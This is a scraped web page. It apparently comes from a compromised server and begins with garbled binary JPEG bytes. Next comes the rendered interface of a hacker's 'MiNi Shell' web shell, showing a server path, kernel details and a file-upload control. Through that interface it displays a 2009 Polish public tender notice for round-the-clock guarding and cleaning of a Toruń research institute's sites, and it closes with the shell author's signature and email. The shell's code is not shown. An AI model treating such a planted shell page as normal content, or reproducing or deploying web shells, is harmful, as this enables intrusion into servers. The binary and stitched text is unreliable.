JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20091022/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20091022/185543-N-2009.html

<p class="kh_header"><b>Toruń: Całodobowy  dozór i ochronę mienia oraz sprzątanie pomieszczeń  laboratoryjno - biurowych</b><br>
<b>Numer ogłoszenia: 185543 - 2009; data zamieszczenia: 22.10.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Instytut Inżynierii Materiałów Polimerowych i Barwników , Ul. M. Skłodowskiej - Curie 55, 87-100 Toruń, woj. kujawsko-pomorskie, tel. 056 6500044 w.149, 123, faks 056 6500333.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.impib.pl</li><li><b>Adres strony internetowej, pod którym dostępne są informacje dotyczące dynamicznego systemu zakupów:</b> nie dotyczy</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: jednostka badawczo-rozwojowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Całodobowy  dozór i ochronę mienia oraz sprzątanie pomieszczeń  laboratoryjno - biurowych.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.	Przedmiotem zamówienia jest całodobowy dozór i ochrona mienia oraz sprzątanie pomieszczeń laboratoryjno - biurowych Instytutu Inżynierii Materiałów Polimerowych i Barwników zwanego dalej Instytutem IMPiB lub Instytutem w następujących lokalizacjach:

1)	w Toruniu w siedzibie Instytutu przy ul. M. Skłodowskiej - Curie 55 i w budynku administracyjnym użyteczności publicznej  przy ul. Szosa Chełmińska 28 - zadanie A
2)	w Gliwicach w siedzibie Oddziału Zamiejscowego Farb i Tworzyw przy  ul. Chorzowska 50A - zadanie B
3)	w Zgierzu  w siedzibie Oddziału Zamiejscowego Barwników i Produktów Organicznych przy ul. Chemików 2/4 i  w Łodzi  w budynku   przy ul. Sienkiewicza 55 - zadanie C
4)	w Piastowie w siedzibie Oddziału Zamiejscowego Elastomerów i Technologii Gumy  przy ul. Harcerskiej  30 - zadanie D


   2. Zadanie A  obejmuje:
1)	całodobowy dozór  i ochronę mienia oraz  sprzątanie pomieszczeń laboratoryjno - biurowych  w  Toruniu w siedzibie Instytutu przy ul. M. Skłodowskiej - Curie 55, w tym:
a) dozór i ochrona budynków oraz mienia  na nieruchomości o powierzchni  16.660 m2  położonej w Toruniu przy ul. M. Skłodowskiej - Curie 55, na której posadowione są budynki:
- laboratorium techniczne wraz z częścią biurową o pow. 1200 m2,
- hala produkcyjna wyrobów w metalu z częścią wysoką o pow. 2500 m 2,
- hala produkcyjna wyrobów z tworzyw sztucznych z częścią socjalno-biurową o pow. 800 m2,
- magazyn, garaż na samochód ciężarowy i samochód osobowy, stolarnia i lakiernia o pow. łącznej  230 m2,
-  wiata o pow. 156 m2,
b) w zakresie dozoru i ochrony mienia świadczenie całodobowej usługi portierskiej w siedzibie Instytutu przy ul. M. Skłodowskiej - Curie 55 obejmującej w szczególności kontrolę:
- ruchu osobowego,
- ruchu pojazdów wjeżdżających i wyjeżdżających,
- rejestrowania wwożonych i wywożonych materiałów i surowców, a także gotowych wyrobów, urządzeń, maszyn, podzespołów, detali itp.,
- osób wchodzących do budynków bądź  na teren Instytutu i wychodzących,
a nadto:
- prowadzenie dokumentacji ewidencyjnej dotyczącej ruchu osobowo - transportowego i materiałowego,
- prowadzenie ewidencji przebywania gości na terenie Instytutu,
- prowadzenie ewidencji wydanych/odbieranych kluczy od pomieszczeń,
- obsługa centrali telefonicznej i łączenie rozmów telefonicznych w dni robocze od poniedziałku do piątku w godz. 7oo  do 15oo,
utrzymanie porządku na terenie posesji w tym:
 w okresie letnim strzyżenie trawników i  pielęgnacja krzewów na posesji własnym sprzętem, w okresie jesiennym grabienie liści, w okresie zimowym odśnieżanie przejść i chodników oraz dróg wewnętrznych dojazdowych, posypywanie ich piaskiem dostarczonym przez Instytut IMPiB.
c) sprzątanie pomieszczeń w siedzibie Instytutu przy ul. M. Skłodowskiej - Curie 55 w Toruniu przy użyciu własnych środków czystości  oraz  własnego sprzętu i urządzeń obejmujące  w szczególności:
-  co najmniej  2 razy w roku mycie okien wewnątrz i na zewnątrz  budynku laboratoryjno-administracyjnego,
- utrzymanie w czystości wszystkich powierzchni poziomych o łącznej powierzchni 2400 m2;  w tym: w budynku laboratoryjno-administracyjnego -o  pow. 1200 m2  oraz w budynku C - części wysokiej  pow. 600 m2 , części znajdującej się w bud. C na I p. o pow. 100 m2  i w części socjalnej na parterze (łazienki, prysznice i szatnie) o pow. ok.100 m2 .
- zabezpieczenie sekretariatu w płyn do naczyń i ręczniki jednorazowego użytku,
- zabezpieczenie  12  łazienek wraz z WC  w papier toaletowy, ręczniki jednorazowego użytku, odświeżacze powietrza oraz mydło w płynie.
- opróżnianie koszy wraz z wymianą worków na śmieci.

2)	całodobowy dozór  i ochronę budynku oraz mienia w budynku administracyjnym użyteczności publicznej  przy ul. Szosa Chełmińska 28 w Toruniu, w tym ochrona mienia  i zabezpieczenie urządzeń znajdujących się w budynku oraz świadczenie całodobowej usługi portierskiej obejmującej w szczególności:
- wydawanie upoważnionym osobom i odbiór kluczy z instytucji mających w budynku swoje siedziby,
- udzielanie informacji  dot. lokalizacji instytucji mających siedziby w wieżowcu, 
- informowanie działu administracyjnego Instytutu  IMPiB o wystąpieniu awarii urządzeń, zauważonych  zagrożeniach powstania awarii, itp.
- w okresie letnim utrzymanie w należytym stanie trawników, a także pielęgnacja krzewów własnym sprzętem (strzyżenie trawników, podcinanie żywopłotów i podlewanie zieleńców ),
- całoroczne utrzymanie porządku na terenie przylegającym do portierni, w tym m.in. mycie co najmniej jeden raz w m-cu okna w portierni i drzwi w holu budynku z użyciem własnych środków czystości i sprzętu.
- całoroczne utrzymanie porządku na terenie przylegającym do budynku i miejscach parkingowych polegające m.in. na wygrabianiu i zamiataniu  opadających liści z drzew
- w okresie zimowym odśnieżanie przejść i chodników oraz dróg wewnętrznych dojazdowych, posypywanie ich piaskiem z solą  dostarczonym przez Instytut IMPiB.

3.	 Zadanie B obejmuje:   
całodobowy dozór  i ochronę mienia w siedzibie Oddziału Zamiejscowego  Farb i Tworzyw przy ul. Chorzowskiej  50  w Gliwicach oraz  sprzątanie pomieszczeń laboratoryjno - biurowych, w tym: 
a) dozór i ochrona mienia   na nieruchomości o pow. 2.137,00 m2  i posadowionego na niej  budynku laboratoryjno-biurowego o pow.  2.362,40 m2 i mienia  znajdującego się na terenie Oddziału.
b) w zakresie dozoru i ochrony mienia świadczenie całodobowej usługi portierskiej w siedzibie Oddziału przy ul. Chorzowskiej  50 A   obejmującej w szczególności: 
- prowadzenie dokumentacji ewidencyjnej dotyczącej ruchu osobowego  i materiałowego,
- prowadzenie ewidencji wydanych/odbieranych kluczy od pomieszczeń,
- prowadzenie ewidencji przebywania gości na terenie Instytutu.
- obsługa centrali telefonicznej i łączenie rozmów telefonicznych w dni robocze od poniedziałku do piątku w godz. 7oo  do 15oo,
- utrzymanie porządku na terenie posesji w tym:
 w okresie letnim strzyżenie trawników i  pielęgnacja krzewów na posesji własnym sprzętem, w okresie jesiennym grabienie liści, w okresie zimowym odśnieżanie przejść i chodników oraz dróg wewnętrznych dojazdowych, posypywanie ich piaskiem dostarczonym przez Instytut IMPiB.
c) sprzątanie pomieszczeń laboratoryjno - biurowych w siedzibie  Oddziału Zamiejscowego  Farb i Tworzyw przy ul. Chorzowskiej  50 A przy użyciu własnych środków czystości  oraz  własnego sprzętu i urządzeń obejmujące w szczególności : 
- co najmniej 2 razy w roku mycie okien wewnątrz budynku  laboratoryjno-biurowego,
-  utrzymanie w czystości wszystkich powierzchni poziomych o łącznej powierzchni 2360 m2;  w tym: 
- zabezpieczenie sekretariatu w płyn do naczyń i ręczniki jednorazowego użytku,
- zabezpieczenie 4 łazienek wraz z WC  w papier toaletowy, odświeżacze powietrza,  ręczniki jednorazowego użytku oraz mydło w płynie,
- opróżnianie koszy wraz z wymianą worków na śmieci.

4. Zadanie C obejmuje: 
1)  całodobowy dozór  i ochronę mienia  oraz sprzątanie  pomieszczeń laboratoryjno - biurowych w Zgierzu w siedzibie  Oddziału Zamiejscowego  Barwników i Produktów Organicznych  przy ul. Chemików 2/4, w tym:
 a) dozór i ochrona budynków oraz mienia w siedzibie  Oddziału Zamiejscowego przy ul. Chemików 2/4 na nieruchomości pow. 10.065 m2 ,  w tym:
- budynku  syntezy 
-  budynku laboratoryjno-biurowego 
-  hali półtechniki,
-  budynku magazynowego, 
-  garaży,
-  warsztatu  mechanicznego.
b) w zakresie dozoru i ochrony mienia świadczenie całodobowej usługi portierskiej w siedzibie Oddziału Zamiejscowego przy ul. Chemików  2/4  obejmującej w szczególności: 
- kontrolę ruchu osobowego,
- prowadzenie ewidencji przebywania gości na terenie Instytutu, 
- kontrolę ruchu pojazdów wjeżdżających i wyjeżdżających,
- rejestrowanie wwożonych i wywożonych materiałów i surowców, a także linii urządzeń, maszyn itp.,
- kontrolę osób wchodzących do budynków bądź  na teren Instytutu i wychodzących,
a nadto:
- prowadzenie dokumentacji ewidencyjnej dotyczącej ruchu osobowo - transportowego i materiałowego,
- prowadzenie ewidencji wydanych/odbieranych kluczy od pomieszczeń,
- utrzymanie porządku na terenie posesji w tym:
 w okresie letnim strzyżenie trawników i  pielęgnacja krzewów na posesji własnym sprzętem, w okresie jesiennym grabienie liści, w okresie zimowym odśnieżanie przejść i chodników oraz dróg wewnętrznych dojazdowych, posypywanie ich piaskiem dostarczonym przez Instytut IMPiB.
c) sprzątanie pomieszczeń w siedzibie Oddziału w Zgierzu   przy użyciu własnych środków czystości  oraz  własnego sprzętu i urządzeń obejmujące w szczególności:
- co najmniej  2 razy w roku mycie okien wewnątrz i na zewnątrz  budynku  laboratoryjno-biurowego, 
-  utrzymanie w czystości wszystkich powierzchni poziomych o łącznej powierzchni  1855 m2
- zabezpieczenie sekretariatu w płyn do naczyń i ręczniki jednorazowego użytku,
- zabezpieczenie  ogółem 3  łazienek wraz z WC  w papier toaletowy, ręczniki jednorazowego użytku, odświeżacze powietrza oraz mydło w płynie.
- opróżnianie koszy wraz z wymianą worków na śmieci.
2)   sprzątanie pomieszczeń laboratoryjno - biurowych w budynku  zlokalizowanym  w Łodzi  przy ul. Sienkiewicza 55 przy użyciu własnych środków czystości  oraz  własnego sprzętu i urządzeń obejmujące w  szczególności:
-  co najmniej  2 razy w roku mycie okien wewnątrz i na zewnątrz  budynku  laboratoryjno-biurowego, 
-  utrzymanie w czystości wszystkich powierzchni poziomych o łącznej powierzchni  273 m 2   
- zabezpieczenie  ogółem 1 łazienki wraz z WC  w papier toaletowy, ręczniki jednorazowego użytku, odświeżacze powietrza oraz mydło w płynie,
- opróżnianie koszy wraz z wymianą worków na śmieci.

5.	 Zadanie D obejmuje:
całodobowy dozór  i ochronę mienia oraz sprzątanie powierzchni  pomieszczeń laboratoryjno - biurowych w Piastowie w siedzibie Oddziału Zamiejscowego Elastomerów i Technologii Gumy  przy  ul. Harcerskiej 30    w tym:
a)	dozór i ochrona 5 budynków o  łącznej  pow.  24.829 m2 zlokalizowanych na posesji oddziału przy ul Harcerskiej 30, na której znajduje się:
-  budynek  biurowy                           
            -  budynek  laboratoryjny                   
            -  budynek  hali technologicznej         
            -  budynek kotłowni i garażu            
            -  budynek magazynowo - gospodarczy    
         a także   mienia  znajdującego się na terenie Oddziału.
b) w zakresie dozoru i ochrony mienia świadczenie całodobowej usługi portierskiej w siedzibie oddziału obejmującej w szczególności: 
- prowadzenie dokumentacji ewidencyjnej dotyczącej ruchu osobowego  i materiałowego,
- prowadzenie ewidencji wydanych/odbieranych kluczy od pomieszczeń,
- prowadzenie ewidencji przebywania gości na terenie Instytutu,
- obsługa centrali telefonicznej i łączenie rozmów telefonicznych w dni robocze od poniedziałku do piątku w godz. 7oo  do 15oo,
- utrzymanie porządku na terenie posesji w tym:
 w okresie letnim strzyżenie trawników i  pielęgnacja krzewów na posesji własnym sprzętem, w okresie jesiennym grabienie liści, w okresie zimowym odśnieżanie przejść i chodników oraz dróg wewnętrznych dojazdowych, posypywanie ich piaskiem dostarczonym przez Instytut IMPiB.

Zamawiający  wymaga, aby w Oddziale służbę pełniło 3 pracowników ochrony na dobę, w tym godz. 6.00 - 20.00  - 1 pracownik ochrony, godz. 20.00- 6.00   - 2 pracowników ochrony. Szef ochrony - jeden pracownik, powinien posiadać licencję pracownika ochrony fizycznej drugiego stopnia,  wartownik  - dwóch pracowników licencja pracownika ochrony fizycznej pierwszego stopnia. Zamawiający wymaga ponadto następującego wyposażenia pracowników ochrony w paralizatory elektryczne  - 2 szt., pałki wielofunkcyjne - 2 szt., kajdanki - 2 szt. Powyższe wyposażenie powinny znajdować się w zabezpieczonej kasetce na terenie Oddziału.
                                                                      
c) sprzątanie pomieszczeń w siedzibie  Oddziału Zamiejscowego w Piastowie Elastomerów i Technologii Gumy  przy ul. Harcerskiej 30 przy użyciu własnych środków czystości  oraz  własnego sprzętu i urządzeń obejmujące, w szczególności :
- co najmniej  2 razy w roku mycie okien wewnątrz i zewnątrz budynków
- utrzymanie w czystości wszystkich powierzchni poziomych o łącznej powierzchni  
  7900 m2;  w tym: 
- zabezpieczenie sekretariatu w płyn do naczyń i ręczniki jednorazowego użytku, 
  odświeżacze powietrza oraz mydło w płynie. 
- zabezpieczenie 9 łazienek wraz z WC  w papier toaletowy, odświeżacze powietrza,   
  oraz mydło w płynie, 
- opróżnianie koszy wraz z wymianą worków na śmieci.

Zamawiający umożliwi wykonawcom zapoznanie się z obiektami, w których będą wykonywane  usługi i ich planami sytuacyjnymi po uprzednim telefonicznym uprzedzeniu osób uprawnionych do kontaktowania się z wykonawcami.</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 98.34.11.40-8, 98.34.11.20-2, 79.71.00.00-4, 90.91.00.00-9.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2010.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> nie dotyczy<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> 1.	 O zamówienie może ubiegać się Wykonawca, który spełnia następujące warunki:
a)	posiada uprawnienia do wykonywania działalności określonej przedmiotem niniejszego zamówienia, jeżeli ustawa nakłada obowiązek posiadania takich uprawnień, tj.  posiadają w szczególności aktualną koncesję w zakresie ochrony mienia; 
b)	posiada niezbędną wiedzę i doświadczenie oraz dysponuje potencjałem technicznym i osobami zdolnymi do wykonania zamówienia lub przedstawi pisemne zobowiązanie innych podmiotów do udostępnienia potencjału technicznego i osób zdolnych do wykonania zamówienia. Zamawiający wymaga w tym zakresie wykonanie w okresie ostatnich 3 lat przed dniem wszczęcia postępowania o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, co najmniej jednej usługi dozoru lub ochrony mienia o wartości co najmniej 60.000, 00 zł i jednej usługi sprzątania o wartości co najmniej 25.000,00 zł., albo jednej usługi dozoru (ochrony) i sprzątania o wartości łącznej nie mniejszej niż 85.000,00 zł.
c)	znajduje się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia, w szczególności posiadają  ubezpieczenie od odpowiedzialności cywilnej z tytułu prowadzonej działalności gospodarczej w zakresie objętym przedmiotem zamówienia, na  sumę ubezpieczenia  nie niższą niż 1.000.000,00 zł.
d)	nie podlega wykluczeniu z postępowania o udzielenie zamówienia publicznego - art. 24 ust. 1 oraz 2 ustawy p.z.p.

2.	  Ocena spełniania warunków dokonana zostanie zgodnie z formułą spełnia - nie spełnia, na podstawie informacji zawartych w dokumentach i oświadczeniach załączonych do oferty..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> Spełnianie warunków określonych w ust.1 oceniane będzie poprzez sprawdzenie
           złożonych przez oferenta niżej wymienionych dokumentów i oświadczeń:
a)	aktualny odpis z właściwego rejestru albo odpis zaświadczenia o wpisie do ewidencji działalności gospodarczej. Za aktualny uważa się dokument wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert. Jeżeli Wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczpospolitej Polskiej, zamiast powyższego dokumentu składa dokument lub dokumenty wystawione w kraju, w którym ma siedzibę lub miejsce zamieszkania, potwierdzające, że nie otwarto jego likwidacji ani nie ogłoszono upadłości. Jeżeli w kraju pochodzenia osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się takich dokumentów zastępuje się je dokumentem zawierającym oświadczenie złożone  przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio kraju pochodzenia osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania. Dokumenty powinny być wystawione nie wcześniej niż 6 miesięcy przed  upływem terminu składania ofert;
b)	aktualna koncesja na podjęcie działalności gospodarczej w zakresie usług ochrony mienia;
c)	oświadczenie z art. 22 ust.1 p.z.p., zawarte na druku Oświadczenie - załącznik nr 2 do SIWZ;
d)	pisemne zobowiązanie innych podmiotów do udostępnienia potencjału technicznego lub osób zdolnych do wykonania zamówienia, jeżeli wykonawca będzie korzystał z potencjału lub osób pochodzących od innych podmiotów;
e)	wykaz wykonanych usług w okresie ostatnich 3 lat przed dniem wszczęcia postępowania o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, potwierdzający wykonanie co najmniej jednej usługi dozoru lub ochrony mienia o wartości co najmniej 60.000, 00 zł i jednej usługi sprzątania o wartości co najmniej 25.000,00 zł.,albo jednej usługi dozoru (ochrony) i sprzątania o wartości łącznej nie mniejszej niż 85.000,00 zł z podaniem ich wartości, przedmiotu, dat (roku) wykonania i odbiorców, wraz z załączeniem posiadanych dokumentów (referencji) potwierdzających należyte wykonanie tych usług - zgodnie z załącznikiem nr 3 do SIWZ.
f)	polisa, a w przypadku jej braku inny dokument potwierdzający, że Wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności gospodarczej objętej przedmiotem zamówienia na  sumę ubezpieczenia  nie niższą niż 1.000.000,00 zł..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.impib.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Specyfikację istotnych warunków zamówienia można uzyskać pod adresem: Instytut Inżynierii Materiałów Polimerowych i Barwników w Toruniu ul. Marii Skłodowskiej -Curie 55 87-100 Toruń, pokój nr 109..</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 02.11.2009 godzina 08:00, miejsce: Oferty należy składać w sekretariacie (pokój nr 107) Instytutu Inżynierii Materiałów Polimerowych i Barwników w Toruniu, ul. M. Skłodowskiej - Curie 55, 87-100 Toruń.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com